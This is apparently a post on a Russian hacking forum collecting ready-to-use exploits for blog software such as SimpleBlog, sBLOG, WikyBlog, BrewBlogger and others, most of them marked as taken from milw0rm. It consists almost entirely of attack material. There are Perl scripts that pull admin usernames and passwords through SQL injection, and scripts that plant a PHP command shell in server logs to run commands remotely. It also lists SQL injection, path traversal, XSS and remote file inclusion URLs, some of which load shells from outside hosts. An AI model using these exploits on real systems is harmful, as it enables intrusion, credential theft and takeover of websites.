|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
SimpleBlog 3.0 SQL Injection
PHP код:
#!/usr/bin/perl
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# SimpleBlog 3.0 [ comments_get.asp ] #
# ] Remote SQL Injection [ #
# #
# [c]ode by TrinTiTTY [at] g00ns.net #
# Vulnerability by MurderSkillz #
# #
# shoutz: z3r0, kat, str0ke, rezen, fish, wicked, clorox, #
# Canuck, a59, sess, bernard, + the rest of g00ns #
# [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
use LWP::UserAgent;
$host = @ARGV[0];
$ua = LWP::UserAgent->new;
my $inject ='comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS';
if (@ARGV < 1){&top( );&usage( )}
elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
else { &xpl( ) }
sub xpl( ) {
&top( );
print "\n [~] Connecting\n";
$res = $ua->get("http://$host/$inject");
$con = $res->content;
print "\n [~] Checking for admin info\n";
if ($con =~ /<strong>([-_+.\w]{1,15})<\/strong>/gmi)
{
print "\n\t [+] Admin user: $1\n";
}
if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi)
{
print "\n\t [+] Admin password: $2\n";
print "\n [+] Complete\n";
}
else {
print "\n [-] Unable to retrieve admin info\n";
exit(0);
}
}
sub top( )
{
print q {
##################################################################
# SimpleBlog 3.0 [ comments_get.asp ] #
# ] Remote SQL Injection [ #
# #
# [c]ode by TrinTiTTY [at] g00ns.net #
# Vulnerability by MurderSkillz #
##################################################################
}
}
sub usage( )
{
print "\n Usage: perl simpleblog3.pl <host>\n";
print "\n Example: perl simpleblog3.pl www.example.com/path\n\n";
exit(0);
}
# milw0rm.com [2007-07-28]
BlogSite Professional SQL Injection
Код:
http://www.server.com/index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*
6ALBlog SQL Injection
Код:
http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,concat(user,0x3a,pass),3,4,5,6,7%20from%20blog_users/*
BlogMe 3.0 SQL Injection
Код:
/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin
Archangel Weblog 0.90.02 Local File Inclusion
Код:
http://Target.com/blog/index.php?index=../../../../etc/passwd%00
sBLOG 0.7.3 Beta Local File Inclusion
PHP код:
#!/usr/bin/perl
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit
# D.Script: http://sourceforge.net/projects/sblog/
# V.Code:
# if(isset($conf_lang_default) && file_exists('lang/' . $conf_lang_default . '.php'))
# require('lang/' . $conf_lang_default . '.php');
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:HackEr_@w.Cn
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx : w4ck1ng.com & cyb3rt & 020
use IO::Socket;
use LWP::Simple;
#ripped
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3) {
print "
===============================================================
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit #
# Gold.pl [Victim] / (apachepath) #
# Ex: Gold.pl [Victim] / ../logs/error.log #
===============================================================
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group #
# Thanx : w4ck1ng.com & cyb3rt & 020 #
===============================================================
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "Code is injecting in logfiles...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
print "[shell] ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
#now include parameter
print $socket "GET ".$path."/inc/lang.php?conf_lang_default=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = <STDIN>;
}
# milw0rm.com [2007-03-29]
WBBlog (XSS/SQL)
Код:
index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*
index.php?cmd=viewentry&e_id="><script>alert('Anti chat')</script>
WebLog File Disclosure
http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
http://localhost/blog/index.php?show=showarticles&file=../admin.php <<< username&password(md5)
BP Blog 7.0 SQL Injection
Код:
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Админка:
b2 Blog <= 0.5 Remote File Include
Код:
http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt?
BLOG:CMS <= 4.1.3 Remote Inclusion
Код:
http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin
WikyBlog 1.3.2 Local File Inclusion
PHP код:
#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# WikyBlog Local File Inclusion Exploit #
#################################################################################################
# Software: WikyBlog 1.3 #
# #
# Vendor: http://www.wikyblog.com/ #
# #
# Released: 2006/12/01 #
# #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #
# #
# Note: The information provided in this document is for WikyBlog administrator #
# testing purposes only! #
# #
# This exploit makes use of a local file inclusion exploit in #
# WikyBlog to allow command execution. Firstly it locates an #
# access_log, or error_log then it inserts a PHP Shell into #
# the log file and returns a link for command execution. #
# #
# include/WBmap.php?l=file_to_include%00 #
# register_globals being on does not affect this vulnerability #
#################################################################################################
use IO::Socket;
use Switch;
$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$folder = @ARGV[1]; # /wikyblog/
sub Header()
{
print q {#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# WikyBlog Local File Inclusion Exploit #
#################################################################################################
};
}
sub Usage()
{
print q {Usage: wikyblogxpl1.3.pl [target] [folder]
Example: wikyblogxpl1.3.pl localhost /wikyblog/
};
exit();
}
Header();
if (!$target || !$folder) {
Usage(); }
# log list taken from Kacper's http://www.milw0rm.com/exploits/2253
@paths=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n";
print $sock "Host: $target\n";
print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $sock "Accept: text/html\n";
print $sock "Connection: close\n\n\r\n";
#locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253
$out = "";
while ($answer = <$sock>) {
$out.=$answer; }
close($sock);
if ($out =~ m/_exppl_(.*?)_exppl_/ms) {
print "[+] Log file found! [".$path."] \n";
$log = $path; }
}
if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }
print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
print "[+] Sent code...\n";
print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00";
# milw0rm.com [2006-12-01]
SimpleBlog <= 2.3 SQL Injection
Код:
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
BrewBlogger 1.3.1 SQL Injection
PHP код:
#!/usr/bin/perl
###########################################################################################
#Target:
#
# BewBlogger 1.3.1
# http://brewblogger.zkdigital.com
#
#Vulnerability:
#
# SQL Injection
#
#Description:
#
# BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
# Since each user entry contains an auto-incrementing ID number, it is possible to
# enumerate all user names and passwords stored in the 'users'database by iterating
# through every possible ID number.
#
#Vulnerable Code (truncated):
#
# $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
# $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
# $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Usage:
# This script will produce a URL which will reveal the user name and password for
# the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
# the first user). The user name will be listed as "Method:" under 'General
# Information', and the password will be listed as "Cost:".
#
#Usage:
# ./brewblog.pl <domain name + path> [user id]
#
#Examples:
#
# ./brewblogger.pl www.beerblog.com 3
# ./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
# intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
# Craig Heffner
# heffnercj [at] gmail.com
# http://www.craigheffner.com
###########################################################################################
print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
# #
# Discovered and coded by: Craig Heffner #
###########################################
';
if(!$ARGV[0] || $ARGV[0] eq "-h"){
print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
exit;
}
if(!$ARGV[1]){
$id = 2;
} else {
$id = $ARGV[1];
}
$url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";
$a = 1;
while($a < 211){
if($a == 8){
$string .= "user_name,";
} elsif($a == 9){
$string .= "password,";
} elsif($a == 210){
$string .= "1";
} else {
$string .= "1,";
}
$a++;
}
print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n";
exit;
# milw0rm.com [2006-11-10]
IrayoBlog 0.2.4 Remote File Include
Код:
http://[target]/[path]/inc/irayofuncs.php?irayodirhack=http://evilsite.com/shell?
vBlog / C12 0.1 Remote File Include
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?
|